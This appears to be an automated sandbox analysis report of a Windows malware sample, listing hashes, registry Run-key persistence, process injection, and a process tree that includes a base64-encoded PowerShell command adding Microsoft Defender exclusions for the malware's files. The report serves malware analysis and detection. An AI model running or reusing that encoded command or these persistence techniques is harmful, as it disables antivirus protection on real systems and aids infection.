Analysis
-
max time kernel
126s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-12-2024 10:27
Static task
static1
Behavioral task
behavioral1
Sample
Opdxdyeul.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Opdxdyeul.exe
Resource
win10v2004-20241007-en
General
-
Target
Opdxdyeul.exe
-
Size
894KB
-
MD5
cee58644e824d57927fe73be837b1418
-
SHA1
698d1a11ab58852be004fd4668a6f25371621976
-
SHA256
4235c78ffaf12c4e584666da54cfc5dc56412235f5a2d313dcac07d1314dd52e
-
SHA512
ab9e9083ed107b5600f802ec66dab71f1064377749b6c874f8ce6e9ce5b2718a1dc45372b883943a8eae99378d1151ce15983d4c9be67d559cd72b28b9f55fb5
-
SSDEEP
12288:etFDEnlFaqLcsjwwdbriOXrWh+7SmCHK4A04KJeYtS1dFXuehyFJ97wQjGuNafNJ:6q9ctmHiCpd4FJe0oeehyjPiuNv/L
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 5748 tshg.exe 5576 tshg.exe 5996 tshg.exe 5664 tshg.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Yjlwuuys = "C:\\Users\\Admin\\AppData\\Roaming\\Yjlwuuys.exe" Opdxdyeul.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2692 set thread context of 5504 2692 Opdxdyeul.exe 33 PID 5748 set thread context of 5576 5748 tshg.exe 36 PID 5996 set thread context of 5664 5996 tshg.exe 39 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\Test Task17.job Opdxdyeul.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Opdxdyeul.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Opdxdyeul.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tshg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tshg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tshg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tshg.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 5372 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2692 Opdxdyeul.exe Token: SeDebugPrivilege 5372 powershell.exe Token: SeDebugPrivilege 2692 Opdxdyeul.exe Token: SeDebugPrivilege 5748 tshg.exe Token: SeDebugPrivilege 5748 tshg.exe Token: SeDebugPrivilege 5996 tshg.exe Token: SeDebugPrivilege 5996 tshg.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2692 wrote to memory of 5372 2692 Opdxdyeul.exe 31 PID 2692 wrote to memory of 5372 2692 Opdxdyeul.exe 31 PID 2692 wrote to memory of 5372 2692 Opdxdyeul.exe 31 PID 2692 wrote to memory of 5372 2692 Opdxdyeul.exe 31 PID 2692 wrote to memory of 5504 2692 Opdxdyeul.exe 33 PID 2692 wrote to memory of 5504 2692 Opdxdyeul.exe 33 PID 2692 wrote to memory of 5504 2692 Opdxdyeul.exe 33 PID 2692 wrote to memory of 5504 2692 Opdxdyeul.exe 33 PID 2692 wrote to memory of 5504 2692 Opdxdyeul.exe 33 PID 2692 wrote to memory of 5504 2692 Opdxdyeul.exe 33 PID 2692 wrote to memory of 5504 2692 Opdxdyeul.exe 33 PID 2692 wrote to memory of 5504 2692 Opdxdyeul.exe 33 PID 2692 wrote to memory of 5504 2692 Opdxdyeul.exe 33 PID 5716 wrote to memory of 5748 5716 taskeng.exe 35 PID 5716 wrote to memory of 5748 5716 taskeng.exe 35 PID 5716 wrote to memory of 5748 5716 taskeng.exe 35 PID 5716 wrote to memory of 5748 5716 taskeng.exe 35 PID 5748 wrote to memory of 5576 5748 tshg.exe 36 PID 5748 wrote to memory of 5576 5748 tshg.exe 36 PID 5748 wrote to memory of 5576 5748 tshg.exe 36 PID 5748 wrote to memory of 5576 5748 tshg.exe 36 PID 5748 wrote to memory of 5576 5748 tshg.exe 36 PID 5748 wrote to memory of 5576 5748 tshg.exe 36 PID 5748 wrote to memory of 5576 5748 tshg.exe 36 PID 5748 wrote to memory of 5576 5748 tshg.exe 36 PID 5748 wrote to memory of 5576 5748 tshg.exe 36 PID 5716 wrote to memory of 5996 5716 taskeng.exe 38 PID 5716 wrote to memory of 5996 5716 taskeng.exe 38 PID 5716 wrote to memory of 5996 5716 taskeng.exe 38 PID 5716 wrote to memory of 5996 5716 taskeng.exe 38 PID 5996 wrote to memory of 5664 5996 tshg.exe 39 PID 5996 wrote to memory of 5664 5996 tshg.exe 39 PID 5996 wrote to memory of 5664 5996 tshg.exe 39 PID 5996 wrote to memory of 5664 5996 tshg.exe 39 PID 5996 wrote to memory of 5664 5996 tshg.exe 39 PID 5996 wrote to memory of 5664 5996 tshg.exe 39 PID 5996 wrote to memory of 5664 5996 tshg.exe 39 PID 5996 wrote to memory of 5664 5996 tshg.exe 39 PID 5996 wrote to memory of 5664 5996 tshg.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\Opdxdyeul.exe"C:\Users\Admin\AppData\Local\Temp\Opdxdyeul.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFkAagBsAHcAdQB1AHkAcwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA=2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\Opdxdyeul.exe"C:\Users\Admin\AppData\Local\Temp\Opdxdyeul.exe"2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5504
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B47258B2-097E-406C-ABBD-BCF5E8FCC090} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:5716 -
C:\ProgramData\kgfxd\tshg.exeC:\ProgramData\kgfxd\tshg.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5748 -
C:\ProgramData\kgfxd\tshg.exe"C:\ProgramData\kgfxd\tshg.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5576
-
-
-
C:\ProgramData\kgfxd\tshg.exeC:\ProgramData\kgfxd\tshg.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5996 -
C:\ProgramData\kgfxd\tshg.exe"C:\ProgramData\kgfxd\tshg.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5664
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
894KB
MD5cee58644e824d57927fe73be837b1418
SHA1698d1a11ab58852be004fd4668a6f25371621976
SHA2564235c78ffaf12c4e584666da54cfc5dc56412235f5a2d313dcac07d1314dd52e
SHA512ab9e9083ed107b5600f802ec66dab71f1064377749b6c874f8ce6e9ce5b2718a1dc45372b883943a8eae99378d1151ce15983d4c9be67d559cd72b28b9f55fb5
-
Filesize
214B
MD59159275d7e4199d8848469e17896abc6
SHA1049c020c21cabfc78c19fa5a64e3c4da80b7c536
SHA2563d3948365b28c4084f5a15a8377b1a8eb7743e40379dd87d306d900ab56adaa9
SHA5125c7146ca6ba696fab22d22305578a554c424617ab27f89b060848dfa17ae7e74c1fd512ab0fd68717088fbd0707ac96953faf5dc3f2a2417f0cb54f016602226